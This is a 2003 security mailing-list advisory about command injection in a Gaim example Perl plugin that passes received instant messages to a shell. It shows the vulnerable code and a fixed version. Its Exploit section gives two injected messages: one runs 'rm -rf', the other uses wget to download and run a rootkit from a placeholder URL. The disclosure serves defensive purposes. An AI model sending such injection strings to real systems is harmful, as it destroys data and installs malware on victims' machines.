[UNIX] Gaim Festival Example Plugin Command Execution Vulnerability (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 10/15/03
- Previous message: SecuriTeam: "[NT] Cross-Site Scripting Vulnerability in Wrensoft Zoom Search Engine"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 15 Oct 2003 19:05:46 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Gaim Festival Example Plugin Command Execution Vulnerability (Exploit)
------------------------------------------------------------------------
SUMMARY
<http://sourceforge.net/projects/gaim/> Gaim is an all-in-one IM client
that resembles AIM. Gaim lets you use AIM, ICQ, Yahoo, MSN, IRC, Jabber,
Napster, Zephyr, and Gadu-Gadu, all at once. Gaim is NOT endorsed by or
affiliated with AOL, Yahoo, MSN, or Napster. An example plugin provided by
(which many copy-paste from) allows remote attackers to cause it to
execute arbitrary code.
DETAILS
A vulnerability exists in any plugin that has copied its code from the
example plugin to execute arbitrary code.
Vulnerable code (from the example plugin):
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
system("echo \"$string\" | /usr/bin/festival --tts");
}
As taken from:
<http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl>
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
As you can see the system command is executed without adequate attention
to the user provided input.
Exploit:
Just pass the plugin any of these messages (or really any message for that
matter):
Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
rootkit;./rootkit
Solution:
A fixed version of the example plugin would look like this:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
$string =~ s/[^\w]//g;
system("echo \"$string\" | /usr/bin/festival --tts");
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:error@lostinthenoise.net>
error.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Cross-Site Scripting Vulnerability in Wrensoft Zoom Search Engine"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
